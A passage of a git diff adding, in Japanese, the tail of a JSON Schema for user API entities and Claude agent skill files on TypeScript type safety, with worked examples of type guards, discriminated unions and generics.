+          "description": "更新日時"
+        }
+      },
+      "required": ["id", "createdAt", "updatedAt"]
+    },
+
+    "auditFields": {
+      "type": "object",
+      "properties": {
+        "createdBy": {
+          "$ref": "#/$defs/uuid",
+          "readOnly": true,
+          "description": "作成者ID"
+        },
+        "updatedBy": {
+          "$ref": "#/$defs/uuid",
+          "readOnly": true,
+          "description": "更新者ID"
+        }
+      }
+    },
+
+    "problemDetails": {
+      "type": "object",
+      "description": "RFC 7807 Problem Details",
+      "properties": {
+        "type": {
+          "type": "string",
+          "format": "uri",
+          "description": "エラータイプを識別するURI"
+        },
+        "title": {
+          "type": "string",
+          "description": "人間可読なエラータイトル"
+        },
+        "status": {
+          "type": "integer",
+          "minimum": 100,
+          "maximum": 599,
+          "description": "HTTPステータスコード"
+        },
+        "detail": {
+          "type": "string",
+          "description": "エラーの詳細な説明"
+        },
+        "instance": {
+          "type": "string",
+          "format": "uri",
+          "description": "このエラー発生を識別するURI"
+        }
+      },
+      "required": ["type", "title", "status"]
+    },
+
+    "validationError": {
+      "allOf": [
+        { "$ref": "#/$defs/problemDetails" },
+        {
+          "type": "object",
+          "properties": {
+            "errors": {
+              "type": "array",
+              "items": {
+                "type": "object",
+                "properties": {
+                  "field": {
+                    "type": "string",
+                    "description": "エラーが発生したフィールド名"
+                  },
+                  "message": {
+                    "type": "string",
+                    "description": "エラーメッセージ"
+                  },
+                  "code": {
+                    "type": "string",
+                    "description": "エラーコード"
+                  }
+                },
+                "required": ["field", "message"]
+              },
+              "description": "フィールド別のエラー一覧"
+            }
+          }
+        }
+      ]
+    },
+
+    "user": {
+      "type": "object",
+      "description": "ユーザー情報",
+      "allOf": [
+        { "$ref": "#/$defs/baseEntity" },
+        {
+          "type": "object",
+          "properties": {
+            "email": {
+              "$ref": "#/$defs/email"
+            },
+            "name": {
+              "type": "string",
+              "minLength": 1,
+              "maxLength": 100,
+              "description": "ユーザー名"
+            },
+            "role": {
+              "type": "string",
+              "enum": ["user", "admin", "moderator"],
+              "default": "user",
+              "description": "ユーザーロール"
+            },
+            "status": {
+              "type": "string",
+              "enum": ["active", "inactive", "suspended"],
+              "default": "active",
+              "description": "アカウントステータス"
+            },
+            "profile": {
+              "type": "object",
+              "properties": {
+                "displayName": {
+                  "type": "string",
+                  "maxLength": 50,
+                  "description": "表示名"
+                },
+                "bio": {
+                  "type": "string",
+                  "maxLength": 500,
+                  "description": "自己紹介"
+                },
+                "avatarUrl": {
+                  "type": "string",
+                  "format": "uri",
+                  "description": "アバター画像URL"
+                }
+              },
+              "description": "プロフィール情報"
+            }
+          },
+          "required": ["email", "name"]
+        }
+      ]
+    },
+
+    "userCreate": {
+      "type": "object",
+      "description": "ユーザー作成リクエスト",
+      "properties": {
+        "email": {
+          "$ref": "#/$defs/email"
+        },
+        "name": {
+          "type": "string",
+          "minLength": 1,
+          "maxLength": 100,
+          "description": "ユーザー名"
+        },
+        "password": {
+          "type": "string",
+          "minLength": 8,
+          "maxLength": 128,
+          "writeOnly": true,
+          "description": "パスワード"
+        },
+        "role": {
+          "type": "string",
+          "enum": ["user", "admin", "moderator"],
+          "default": "user",
+          "description": "ユーザーロール"
+        }
+      },
+      "required": ["email", "name", "password"],
+      "additionalProperties": false
+    },
+
+    "userUpdate": {
+      "type": "object",
+      "description": "ユーザー更新リクエスト（部分更新）",
+      "properties": {
+        "name": {
+          "type": "string",
+          "minLength": 1,
+          "maxLength": 100,
+          "description": "ユーザー名"
+        },
+        "status": {
+          "type": "string",
+          "enum": ["active", "inactive", "suspended"],
+          "description": "アカウントステータス"
+        },
+        "profile": {
+          "type": "object",
+          "properties": {
+            "displayName": {
+              "type": "string",
+              "maxLength": 50
+            },
+            "bio": {
+              "type": "string",
+              "maxLength": 500
+            },
+            "avatarUrl": {
+              "type": ["string", "null"],
+              "format": "uri"
+            }
+          },
+          "additionalProperties": false
+        }
+      },
+      "additionalProperties": false
+    },
+
+    "userList": {
+      "type": "object",
+      "description": "ユーザー一覧レスポンス",
+      "properties": {
+        "items": {
+          "type": "array",
+          "items": {
+            "$ref": "#/$defs/user"
+          },
+          "description": "ユーザー一覧"
+        },
+        "pagination": {
+          "$ref": "#/$defs/pagination"
+        }
+      },
+      "required": ["items", "pagination"]
+    }
+  },
+
+  "type": "object",
+  "description": "APIスキーマのルート",
+  "properties": {
+    "user": { "$ref": "#/$defs/user" },
+    "userCreate": { "$ref": "#/$defs/userCreate" },
+    "userUpdate": { "$ref": "#/$defs/userUpdate" },
+    "userList": { "$ref": "#/$defs/userList" },
+    "problemDetails": { "$ref": "#/$defs/problemDetails" },
+    "validationError": { "$ref": "#/$defs/validationError" }
+  }
+}

--- a/.claude/skills/skill_list.md
+++ b/.claude/skills/skill_list.md
@@ -184,13 +184,13 @@
 ```markdown
 - **必要なスキル**:
 
-| スキル名                 | 概要                                                  |
-| ------------------------ | ----------------------------------------------------- |
-| **zod-validation**       | Zod スキーマ定義、型推論、カスタムバリデーション      |
-| **type-safety-patterns** | TypeScript 厳格モード、型ガード、Discriminated Unions |
-| **input-sanitization**   | XSS 対策、SQL インジェクション対策、エスケープ処理    |
-| **error-message-design** | ユーザーフレンドリーなエラーメッセージ、i18n 対応     |
-| **json-schema**          | JSON Schema 仕様、スキーマバージョニング              |
+| スキル名                 | パス                                                  | 概要                                                  |
+| ------------------------ | ----------------------------------------------------- | ----------------------------------------------------- |
+| **zod-validation**       | `.claude/skills/zod-validation/SKILL.md`              | Zod スキーマ定義、型推論、カスタムバリデーション      |
+| **type-safety-patterns** | `.claude/skills/type-safety-patterns/SKILL.md`        | TypeScript 厳格モード、型ガード、Discriminated Unions |
+| **input-sanitization**   | `.claude/skills/input-sanitization/SKILL.md`          | XSS 対策、SQL インジェクション対策、エスケープ処理    |
+| **error-message-design** | `.claude/skills/error-message-design/SKILL.md`        | ユーザーフレンドリーなエラーメッセージ、i18n 対応     |
+| **json-schema**          | `.claude/skills/json-schema/SKILL.md`                 | JSON Schema 仕様、スキーマバージョニング              |
 ```
 
 ## 12. ビジネスロジック実装

--- a/.claude/skills/type-safety-patterns/SKILL.md
+++ b/.claude/skills/type-safety-patterns/SKILL.md
@@ -1,0 +1,276 @@
+---
+name: type-safety-patterns
+description: |
+  TypeScript厳格モードによる型安全性設計を専門とするスキル。
+  堅牢な型システムを構築し、コンパイル時のエラー検出を最大化することで
+  ランタイムエラーを防止します。
+
+  専門分野:
+  - TypeScript厳格モード: strict, noUncheckedIndexedAccess等の設定
+  - 型ガード: カスタム型ガード、Discriminated Unions
+  - ジェネリクス: 再利用可能な型定義、条件型
+  - Null安全: Optional Chaining、Nullish Coalescing
+
+  使用タイミング:
+  - TypeScript strictモードの設定と最適化時
+  - 型ガードやDiscriminated Unionsの実装時
+  - ジェネリクスを活用した再利用可能な型定義時
+  - null/undefinedの安全な取り扱いが必要な時
+
+  Use proactively when users need to implement type guards, design discriminated unions,
+  or ensure type safety in TypeScript strict mode.
+version: 1.0.0
+---
+
+# Type Safety Patterns
+
+## 概要
+
+このスキルは、TypeScript厳格モードを活用した堅牢な型システムの構築方法を提供します。
+型ガード、Discriminated Unions、ジェネリクスなどの高度な型機能を使いこなし、
+コンパイル時のエラー検出を最大化することで、より安全なコードを実現します。
+
+**主要な価値**:
+- コンパイル時のエラー検出によるランタイムエラーの防止
+- IDEの強力なコード補完と型推論の活用
+- 自己文書化されたコードによる保守性の向上
+
+**対象ユーザー**:
+- スキーマ定義を行うエージェント（@schema-def）
+- 型安全なAPIを設計する開発者
+- TypeScriptの型システムを深く活用したいチーム
+
+## リソース構造
+
+```
+type-safety-patterns/
+├── SKILL.md                                    # 本ファイル
+├── resources/
+│   ├── strict-mode-guide.md                   # TypeScript厳格モード設定
+│   ├── type-guard-patterns.md                 # 型ガードパターン
+│   ├── discriminated-union-patterns.md        # Discriminated Unionsパターン
+│   └── generics-patterns.md                   # ジェネリクスパターン
+├── scripts/
+│   └── check-type-safety.mjs                  # 型安全性チェックスクリプト
+└── templates/
+    └── type-safe-patterns.ts                  # 型安全パターンテンプレート
+```
+
+## コマンドリファレンス
+
+### リソース読み取り
+
+```bash
+# TypeScript厳格モード設定ガイド
+cat .claude/skills/type-safety-patterns/resources/strict-mode-guide.md
+
+# 型ガードパターン
+cat .claude/skills/type-safety-patterns/resources/type-guard-patterns.md
+
+# Discriminated Unionsパターン
+cat .claude/skills/type-safety-patterns/resources/discriminated-union-patterns.md
+
+# ジェネリクスパターン
+cat .claude/skills/type-safety-patterns/resources/generics-patterns.md
+```
+
+### スクリプト実行
+
+```bash
+# 型安全性チェック
+node .claude/skills/type-safety-patterns/scripts/check-type-safety.mjs <file.ts>
+```
+
+### テンプレート参照
+
+```bash
+# 型安全パターンテンプレート
+cat .claude/skills/type-safety-patterns/templates/type-safe-patterns.ts
+```
+
+## いつ使うか
+
+### シナリオ1: 厳格モードの導入
+**状況**: 既存プロジェクトにTypeScript厳格モードを導入したい
+
+**適用条件**:
+- [ ] strictオプションを有効にしたい
+- [ ] 型安全性を高めたい
+- [ ] IDEの補完機能を最大限活用したい
+
+**期待される成果**: 適切に設定されたtsconfig.jsonと型安全なコード
+
+### シナリオ2: 型ガードの実装
+**状況**: ランタイムで型を判別し、型安全に処理したい
+
+**適用条件**:
+- [ ] 外部データの型を確認する必要がある
+- [ ] Union型を安全に絞り込みたい
+- [ ] カスタム型ガード関数を作成したい
+
+**期待される成果**: 型安全な型ガード実装
+
+### シナリオ3: Discriminated Unionsの設計
+**状況**: 複数の状態を持つデータ構造を型安全に設計したい
+
+**適用条件**:
+- [ ] 状態ごとに異なるプロパティを持つ
+- [ ] 状態に応じた処理を型安全に行いたい
+- [ ] 網羅性チェックを活用したい
+
+**期待される成果**: 型安全なDiscriminated Union設計
+
+## 基本概念
+
+### TypeScript厳格モード設定
+
+```json
+// tsconfig.json
+{
+  "compilerOptions": {
+    // 厳格モード（推奨）
+    "strict": true,
+
+    // 追加の厳格オプション
+    "noUncheckedIndexedAccess": true,
+    "exactOptionalPropertyTypes": true,
+    "noImplicitReturns": true,
+    "noFallthroughCasesInSwitch": true,
+    "noPropertyAccessFromIndexSignature": true
+  }
+}
+```
+
+### 型ガードの基本
+
+```typescript
+// typeof型ガード
+function processValue(value: string | number) {
+  if (typeof value === 'string') {
+    // value は string 型として認識
+    return value.toUpperCase();
+  }
+  // value は number 型として認識
+  return value.toFixed(2);
+}
+
+// instanceof型ガード
+function processError(error: Error | string) {
+  if (error instanceof Error) {
+    return error.message;
+  }
+  return error;
+}
+
+// in型ガード
+interface Dog { bark(): void }
+interface Cat { meow(): void }
+
+function makeSound(animal: Dog | Cat) {
+  if ('bark' in animal) {
+    animal.bark();
+  } else {
+    animal.meow();
+  }
+}
+
+// カスタム型ガード（is キーワード）
+function isString(value: unknown): value is string {
+  return typeof value === 'string';
+}
+```
+
+### Discriminated Unions
+
+```typescript
+// 判別フィールドによるユニオン型
+type Result<T> =
+  | { success: true; data: T }
+  | { success: false; error: Error };
+
+function handleResult<T>(result: Result<T>) {
+  if (result.success) {
+    // result.data にアクセス可能
+    console.log(result.data);
+  } else {
+    // result.error にアクセス可能
+    console.error(result.error.message);
+  }
+}
+
+// 状態管理でのDiscriminated Union
+type LoadingState<T> =
+  | { status: 'idle' }
+  | { status: 'loading' }
+  | { status: 'success'; data: T }
+  | { status: 'error'; error: Error };
+
+function renderState<T>(state: LoadingState<T>) {
+  switch (state.status) {
+    case 'idle':
+      return 'Ready';
+    case 'loading':
+      return 'Loading...';
+    case 'success':
+      return `Data: ${state.data}`;
+    case 'error':
+      return `Error: ${state.error.message}`;
+  }
+}
+```
+
+### 網羅性チェック
+
+```typescript
+// never型を使用した網羅性チェック
+function assertNever(x: never): never {
+  throw new Error(`Unexpected value: ${x}`);
+}
+
+type Shape =
+  | { kind: 'circle'; radius: number }
+  | { kind: 'square'; size: number }
+  | { kind: 'rectangle'; width: number; height: number };
+
+function getArea(shape: Shape): number {
+  switch (shape.kind) {
+    case 'circle':
+      return Math.PI * shape.radius ** 2;
+    case 'square':
+      return shape.size ** 2;
+    case 'rectangle':
+      return shape.width * shape.height;
+    default:
+      // 新しいshapeが追加された場合、コンパイルエラー
+      return assertNever(shape);
+  }
+}
+```
+
+## 判断基準チェックリスト
+
+### TypeScript設定時
+- [ ] strict: true が設定されているか？
+- [ ] noUncheckedIndexedAccess を有効にすべきか？
+- [ ] プロジェクトの要件に合った厳格度か？
+
+### 型ガード実装時
+- [ ] 適切な型ガードの種類を選択しているか？
+- [ ] 型述語（is）を正しく使用しているか？
+- [ ] エッジケースを考慮しているか？
+
+### Discriminated Union設計時
+- [ ] 判別フィールドは明確か？
+- [ ] 網羅性チェックが可能な設計か？
+- [ ] 将来の拡張に対応できる設計か？
+
+## 関連スキル
+
+- `.claude/skills/zod-validation/SKILL.md` - Zodバリデーション
+- `.claude/skills/error-message-design/SKILL.md` - エラーメッセージ設計
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース - 型安全性パターンの基本を網羅 |

--- a/.claude/skills/type-safety-patterns/resources/discriminated-union-patterns.md
+++ b/.claude/skills/type-safety-patterns/resources/discriminated-union-patterns.md
@@ -1,0 +1,378 @@
+# Discriminated Unions パターン
+
+## 概要
+
+Discriminated Unions（判別可能なユニオン型）を活用して、
+状態管理や複雑なデータ構造を型安全に設計するパターンを解説します。
+
+## 基本概念
+
+### Discriminated Union とは
+
+判別フィールド（discriminant）を持つユニオン型。
+TypeScriptが自動的に型を絞り込むことができます。
+
+```typescript
+// 判別フィールド: status
+type ApiResponse<T> =
+  | { status: 'success'; data: T }
+  | { status: 'error'; error: { code: string; message: string } }
+  | { status: 'loading' };
+
+function handleResponse<T>(response: ApiResponse<T>) {
+  switch (response.status) {
+    case 'success':
+      // response.data にアクセス可能
+      return response.data;
+    case 'error':
+      // response.error にアクセス可能
+      throw new Error(response.error.message);
+    case 'loading':
+      // データなし
+      return null;
+  }
+}
+```
+
+## 実践パターン
+
+### 状態管理
+
+```typescript
+// フェッチ状態の管理
+type FetchState<T, E = Error> =
+  | { status: 'idle' }
+  | { status: 'loading' }
+  | { status: 'success'; data: T; timestamp: Date }
+  | { status: 'error'; error: E; retryCount: number };
+
+// 使用例
+function useFetch<T>(url: string) {
+  const [state, setState] = useState<FetchState<T>>({ status: 'idle' });
+
+  async function fetch() {
+    setState({ status: 'loading' });
+
+    try {
+      const data = await fetchData<T>(url);
+      setState({ status: 'success', data, timestamp: new Date() });
+    } catch (error) {
+      setState({
+        status: 'error',
+        error: error as Error,
+        retryCount: state.status === 'error' ? state.retryCount + 1 : 1
+      });
+    }
+  }
+
+  return { state, fetch };
+}
+```
+
+### フォーム状態
+
+```typescript
+type FormState<T> =
+  | { status: 'pristine'; values: T }
+  | { status: 'dirty'; values: T; changedFields: (keyof T)[] }
+  | { status: 'submitting'; values: T }
+  | { status: 'submitted'; values: T; response: unknown }
+  | { status: 'error'; values: T; errors: Record<keyof T, string[]> };
+
+function getSubmitButtonText<T>(state: FormState<T>): string {
+  switch (state.status) {
+    case 'pristine':
+      return '送信';
+    case 'dirty':
+      return '変更を保存';
+    case 'submitting':
+      return '送信中...';
+    case 'submitted':
+      return '送信完了';
+    case 'error':
+      return 'エラーを修正してください';
+  }
+}
+```
+
+### イベントハンドリング
+
+```typescript
+type AppEvent =
+  | { type: 'USER_LOGIN'; payload: { userId: string; email: string } }
+  | { type: 'USER_LOGOUT' }
+  | { type: 'DATA_FETCH_START'; payload: { resource: string } }
+  | { type: 'DATA_FETCH_SUCCESS'; payload: { resource: string; data: unknown } }
+  | { type: 'DATA_FETCH_ERROR'; payload: { resource: string; error: Error } };
+
+function eventReducer(state: AppState, event: AppEvent): AppState {
+  switch (event.type) {
+    case 'USER_LOGIN':
+      return { ...state, user: event.payload };
+    case 'USER_LOGOUT':
+      return { ...state, user: null };
+    case 'DATA_FETCH_START':
+      return { ...state, loading: { ...state.loading, [event.payload.resource]: true } };
+    case 'DATA_FETCH_SUCCESS':
+      return {
+        ...state,
+        data: { ...state.data, [event.payload.resource]: event.payload.data },
+        loading: { ...state.loading, [event.payload.resource]: false },
+      };
+    case 'DATA_FETCH_ERROR':
+      return {
+        ...state,
+        errors: { ...state.errors, [event.payload.resource]: event.payload.error },
+        loading: { ...state.loading, [event.payload.resource]: false },
+      };
+  }
+}
+```
+
+### Result型パターン
+
+```typescript
+type Result<T, E = Error> =
+  | { ok: true; value: T }
+  | { ok: false; error: E };
+
+// 成功を作成
+function ok<T>(value: T): Result<T, never> {
+  return { ok: true, value };
+}
+
+// 失敗を作成
+function err<E>(error: E): Result<never, E> {
+  return { ok: false, error };
+}
+
+// Result型を使用した関数
+function divide(a: number, b: number): Result<number, string> {
+  if (b === 0) {
+    return err('Division by zero');
+  }
+  return ok(a / b);
+}
+
+// 使用例
+const result = divide(10, 2);
+if (result.ok) {
+  console.log(result.value); // 5
+} else {
+  console.error(result.error);
+}
+
+// チェーン処理
+function map<T, U, E>(result: Result<T, E>, fn: (value: T) => U): Result<U, E> {
+  if (result.ok) {
+    return ok(fn(result.value));
+  }
+  return result;
+}
+
+function flatMap<T, U, E>(result: Result<T, E>, fn: (value: T) => Result<U, E>): Result<U, E> {
+  if (result.ok) {
+    return fn(result.value);
+  }
+  return result;
+}
+```
+
+### Option型パターン
+
+```typescript
+type Option<T> =
+  | { some: true; value: T }
+  | { some: false };
+
+function some<T>(value: T): Option<T> {
+  return { some: true, value };
+}
+
+function none<T>(): Option<T> {
+  return { some: false };
+}
+
+function fromNullable<T>(value: T | null | undefined): Option<T> {
+  return value == null ? none() : some(value);
+}
+
+// 使用例
+function findUser(id: string): Option<User> {
+  const user = users.find((u) => u.id === id);
+  return fromNullable(user);
+}
+
+const userOption = findUser('123');
+if (userOption.some) {
+  console.log(userOption.value.name);
+}
+```
+
+## 高度なパターン
+
+### 多段階の状態遷移
+
+```typescript
+// ウィザード/ステップフォームの状態
+type WizardState<T extends Record<string, unknown>> =
+  | { step: 'personal'; data: Pick<T, 'name' | 'email'> | null }
+  | { step: 'address'; data: Pick<T, 'name' | 'email' | 'address'> }
+  | { step: 'payment'; data: Pick<T, 'name' | 'email' | 'address' | 'payment'> }
+  | { step: 'confirmation'; data: T }
+  | { step: 'completed'; data: T; orderId: string };
+
+function canProceed(state: WizardState<FormData>): boolean {
+  switch (state.step) {
+    case 'personal':
+      return state.data !== null;
+    case 'address':
+    case 'payment':
+    case 'confirmation':
+      return true;
+    case 'completed':
+      return false;
+  }
+}
+```
+
+### 権限ベースの型
+
+```typescript
+type UserRole = 'guest' | 'user' | 'admin';
+
+type UserWithRole =
+  | { role: 'guest' }
+  | { role: 'user'; userId: string; email: string }
+  | { role: 'admin'; userId: string; email: string; permissions: string[] };
+
+function canAccessAdminPanel(user: UserWithRole): boolean {
+  return user.role === 'admin';
+}
+
+function getUserEmail(user: UserWithRole): string | null {
+  if (user.role === 'guest') {
+    return null;
+  }
+  return user.email;
+}
+```
+
+### 網羅性チェック
+
+```typescript
+// never型を使用した網羅性チェック
+function assertNever(value: never): never {
+  throw new Error(`Unexpected value: ${JSON.stringify(value)}`);
+}
+
+type MessageType =
+  | { type: 'text'; content: string }
+  | { type: 'image'; url: string; alt: string }
+  | { type: 'video'; url: string; duration: number };
+
+function renderMessage(message: MessageType): string {
+  switch (message.type) {
+    case 'text':
+      return `<p>${message.content}</p>`;
+    case 'image':
+      return `<img src="${message.url}" alt="${message.alt}" />`;
+    case 'video':
+      return `<video src="${message.url}" data-duration="${message.duration}"></video>`;
+    default:
+      // 新しい type が追加されるとコンパイルエラー
+      return assertNever(message);
+  }
+}
+```
+
+## Zodとの組み合わせ
+
+```typescript
+import { z } from 'zod';
+
+// Zodでdiscriminated unionを定義
+const resultSchema = z.discriminatedUnion('status', [
+  z.object({
+    status: z.literal('success'),
+    data: z.object({
+      id: z.string(),
+      name: z.string(),
+    }),
+  }),
+  z.object({
+    status: z.literal('error'),
+    error: z.object({
+      code: z.string(),
+      message: z.string(),
+    }),
+  }),
+]);
+
+type Result = z.infer<typeof resultSchema>;
+
+// バリデーション付きで使用
+function processApiResponse(data: unknown): void {
+  const result = resultSchema.parse(data);
+
+  if (result.status === 'success') {
+    console.log(result.data.name);
+  } else {
+    console.error(result.error.message);
+  }
+}
+```
+
+## ベストプラクティス
+
+### 1. 判別フィールドの命名
+
+```typescript
+// ✅ 明確な判別フィールド名
+type GoodUnion =
+  | { kind: 'circle'; radius: number }
+  | { kind: 'square'; size: number };
+
+// ❌ 曖昧な判別フィールド名
+type BadUnion =
+  | { value: 'a'; data1: number }
+  | { value: 'b'; data2: string };
+```
+
+### 2. リテラル型の一貫性
+
+```typescript
+// ✅ 一貫したリテラル型
+type ConsistentUnion =
+  | { type: 'CREATE'; payload: CreatePayload }
+  | { type: 'UPDATE'; payload: UpdatePayload }
+  | { type: 'DELETE'; payload: DeletePayload };
+
+// ❌ 混在するリテラル型
+type InconsistentUnion =
+  | { type: 'create'; payload: CreatePayload }
+  | { action: 'UPDATE'; data: UpdatePayload } // フィールド名が異なる
+  | { type: 3; payload: DeletePayload }; // 数値リテラル
+```
+
+### 3. 型の拡張性
+
+```typescript
+// 基本型を定義
+type BaseEvent = {
+  timestamp: Date;
+  userId: string;
+};
+
+// 拡張可能なイベント型
+type AppEvent =
+  | (BaseEvent & { type: 'login' })
+  | (BaseEvent & { type: 'logout' })
+  | (BaseEvent & { type: 'action'; action: string });
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/type-safety-patterns/resources/generics-patterns.md
+++ b/.claude/skills/type-safety-patterns/resources/generics-patterns.md
@@ -1,0 +1,397 @@
+# ジェネリクスパターン
+
+## 概要
+
+TypeScriptのジェネリクスを活用して、再利用可能で型安全なコードを
+設計するパターンを解説します。
+
+## 基本的なジェネリクス
+
+### 関数ジェネリクス
+
+```typescript
+// 基本的なジェネリック関数
+function identity<T>(value: T): T {
+  return value;
+}
+
+// 使用時に型が推論される
+const str = identity('hello'); // string
+const num = identity(42); // number
+
+// 明示的な型指定
+const arr = identity<string[]>(['a', 'b', 'c']);
+```
+
+### 複数の型パラメータ
+
+```typescript
+function pair<T, U>(first: T, second: U): [T, U] {
+  return [first, second];
+}
+
+const result = pair('hello', 42); // [string, number]
+
+// マップ関数
+function map<T, U>(array: T[], fn: (item: T) => U): U[] {
+  return array.map(fn);
+}
+
+const numbers = map(['1', '2', '3'], (s) => parseInt(s, 10));
+// number[]
+```
+
+### ジェネリック型
+
+```typescript
+// ジェネリックインターフェース
+interface Container<T> {
+  value: T;
+  transform<U>(fn: (value: T) => U): Container<U>;
+}
+
+// ジェネリック型エイリアス
+type Nullable<T> = T | null;
+type Optional<T> = T | undefined;
+type Maybe<T> = T | null | undefined;
+
+// 使用例
+const container: Container<number> = {
+  value: 42,
+  transform<U>(fn: (value: number) => U): Container<U> {
+    return { value: fn(this.value), transform: this.transform };
+  },
+};
+```
+
+## 制約付きジェネリクス
+
+### extends による制約
+
+```typescript
+// 特定の型を継承する制約
+function getLength<T extends { length: number }>(item: T): number {
+  return item.length;
+}
+
+getLength('hello'); // OK
+getLength([1, 2, 3]); // OK
+getLength({ length: 10 }); // OK
+// getLength(42); // エラー: number には length がない
+
+// オブジェクト制約
+function getProperty<T extends object, K extends keyof T>(obj: T, key: K): T[K] {
+  return obj[key];
+}
+
+const user = { name: 'John', age: 30 };
+const name = getProperty(user, 'name'); // string
+const age = getProperty(user, 'age'); // number
+```
+
+### 複数の制約
+
+```typescript
+interface Serializable {
+  serialize(): string;
+}
+
+interface Comparable<T> {
+  compareTo(other: T): number;
+}
+
+// 複数の制約を満たす型
+function process<T extends Serializable & Comparable<T>>(item: T): string {
+  return item.serialize();
+}
+```
+
+## 条件型
+
+### 基本的な条件型
+
+```typescript
+// T が U を継承していれば X、そうでなければ Y
+type Conditional<T, U, X, Y> = T extends U ? X : Y;
+
+type IsString<T> = T extends string ? true : false;
+
+type A = IsString<string>; // true
+type B = IsString<number>; // false
+```
+
+### infer による型抽出
+
+```typescript
+// 関数の戻り値の型を取得
+type ReturnType<T> = T extends (...args: any[]) => infer R ? R : never;
+
+// 配列の要素の型を取得
+type ElementType<T> = T extends (infer E)[] ? E : never;
+
+// Promiseの中身の型を取得
+type Awaited<T> = T extends Promise<infer U> ? U : T;
+
+// 使用例
+type Fn = (x: number) => string;
+type FnReturn = ReturnType<Fn>; // string
+
+type Arr = number[];
+type ArrElement = ElementType<Arr>; // number
+
+type PromiseNum = Promise<number>;
+type PromiseValue = Awaited<PromiseNum>; // number
+```
+
+### 分配条件型
+
+```typescript
+// ユニオン型に対して分配される
+type ToArray<T> = T extends any ? T[] : never;
+
+type Result = ToArray<string | number>;
+// → string[] | number[]
+
+// 分配を防ぐ
+type ToArrayNonDist<T> = [T] extends [any] ? T[] : never;
+
+type Result2 = ToArrayNonDist<string | number>;
+// → (string | number)[]
+```
+
+## マップ型
+
+### 基本的なマップ型
+
+```typescript
+// すべてのプロパティをオプショナルに
+type Partial<T> = {
+  [P in keyof T]?: T[P];
+};
+
+// すべてのプロパティを必須に
+type Required<T> = {
+  [P in keyof T]-?: T[P];
+};
+
+// すべてのプロパティを読み取り専用に
+type Readonly<T> = {
+  readonly [P in keyof T]: T[P];
+};
+
+// 特定のキーのみ抽出
+type Pick<T, K extends keyof T> = {
+  [P in K]: T[P];
+};
+
+// 特定のキーを除外
+type Omit<T, K extends keyof any> = Pick<T, Exclude<keyof T, K>>;
+```
+
+### キーの変換
+
+```typescript
+// キーを変換するマップ型
+type Getters<T> = {
+  [K in keyof T as `get${Capitalize<string & K>}`]: () => T[K];
+};
+
+interface Person {
+  name: string;
+  age: number;
+}
+
+type PersonGetters = Getters<Person>;
+// { getName: () => string; getAge: () => number }
+
+// 条件付きキー変換
+type OnlyMethods<T> = {
+  [K in keyof T as T[K] extends Function ? K : never]: T[K];
+};
+```
+
+## 実践パターン
+
+### APIレスポンスのジェネリック型
+
+```typescript
+// 成功/失敗を表すジェネリック型
+type ApiResponse<T, E = Error> =
+  | { success: true; data: T }
+  | { success: false; error: E };
+
+// ページネーション付きリスト
+type PaginatedList<T> = {
+  items: T[];
+  total: number;
+  page: number;
+  pageSize: number;
+  hasMore: boolean;
+};
+
+// API関数の型
+type ApiFunction<TParams, TResponse> = (
+  params: TParams
+) => Promise<ApiResponse<TResponse>>;
+
+// 使用例
+interface User {
+  id: string;
+  name: string;
+}
+
+type GetUsersFn = ApiFunction<{ page: number }, PaginatedList<User>>;
+```
+
+### ビルダーパターン
+
+```typescript
+// 型安全なビルダー
+class QueryBuilder<T extends object, Selected extends keyof T = never> {
+  private selectedFields: Selected[] = [];
+
+  select<K extends Exclude<keyof T, Selected>>(field: K): QueryBuilder<T, Selected | K> {
+    this.selectedFields.push(field as unknown as Selected);
+    return this as unknown as QueryBuilder<T, Selected | K>;
+  }
+
+  build(): Pick<T, Selected> {
+    // 実際のクエリ実行
+    return {} as Pick<T, Selected>;
+  }
+}
+
+// 使用例
+interface User {
+  id: string;
+  name: string;
+  email: string;
+  age: number;
+}
+
+const query = new QueryBuilder<User>()
+  .select('name')
+  .select('email')
+  .build();
+// Pick<User, 'name' | 'email'>
+```
+
+### 型安全なイベントエミッター
+
+```typescript
+type EventMap = {
+  login: { userId: string };
+  logout: undefined;
+  error: { message: string; code: number };
+};
+
+class TypedEventEmitter<T extends Record<string, any>> {
+  private listeners = new Map<keyof T, Set<Function>>();
+
+  on<K extends keyof T>(event: K, listener: (payload: T[K]) => void): void {
+    if (!this.listeners.has(event)) {
+      this.listeners.set(event, new Set());
+    }
+    this.listeners.get(event)!.add(listener);
+  }
+
+  emit<K extends keyof T>(event: K, payload: T[K]): void {
+    this.listeners.get(event)?.forEach((listener) => listener(payload));
+  }
+}
+
+// 使用例
+const emitter = new TypedEventEmitter<EventMap>();
+
+emitter.on('login', (payload) => {
+  console.log(payload.userId); // 型安全
+});
+
+emitter.emit('login', { userId: '123' }); // OK
+// emitter.emit('login', { userId: 123 }); // エラー
+```
+
+### 深いPartial型
+
+```typescript
+type DeepPartial<T> = T extends object
+  ? { [P in keyof T]?: DeepPartial<T[P]> }
+  : T;
+
+interface Config {
+  server: {
+    host: string;
+    port: number;
+    ssl: {
+      enabled: boolean;
+      cert: string;
+    };
+  };
+  logging: {
+    level: string;
+  };
+}
+
+type PartialConfig = DeepPartial<Config>;
+// すべてのネストされたプロパティがオプショナル
+
+const config: PartialConfig = {
+  server: {
+    port: 3000,
+    // host, ssl は省略可能
+  },
+};
+```
+
+## ベストプラクティス
+
+### 1. 型パラメータの命名規則
+
+```typescript
+// ✅ 意味のある名前
+type Container<TValue> = { value: TValue };
+type KeyValue<TKey, TValue> = { key: TKey; value: TValue };
+
+// 一般的な慣例
+// T: Type（一般的な型）
+// K: Key（オブジェクトのキー）
+// V: Value（値）
+// E: Element（配列要素）
+// R: Return（戻り値）
+```
+
+### 2. デフォルト型の活用
+
+```typescript
+// デフォルト型パラメータ
+interface Response<T = unknown, E = Error> {
+  data?: T;
+  error?: E;
+}
+
+const response1: Response = {}; // T = unknown, E = Error
+const response2: Response<User> = {}; // T = User, E = Error
+const response3: Response<User, ApiError> = {}; // T = User, E = ApiError
+```
+
+### 3. 過度な複雑さを避ける
+
+```typescript
+// ❌ 過度に複雑な型
+type OverlyComplex<
+  T extends object,
+  K extends keyof T,
+  U extends T[K] extends infer R ? R : never,
+  V extends U extends object ? keyof U : never
+> = { /* ... */ };
+
+// ✅ 段階的に分解
+type ExtractValue<T, K extends keyof T> = T[K];
+type ExtractKeys<T> = T extends object ? keyof T : never;
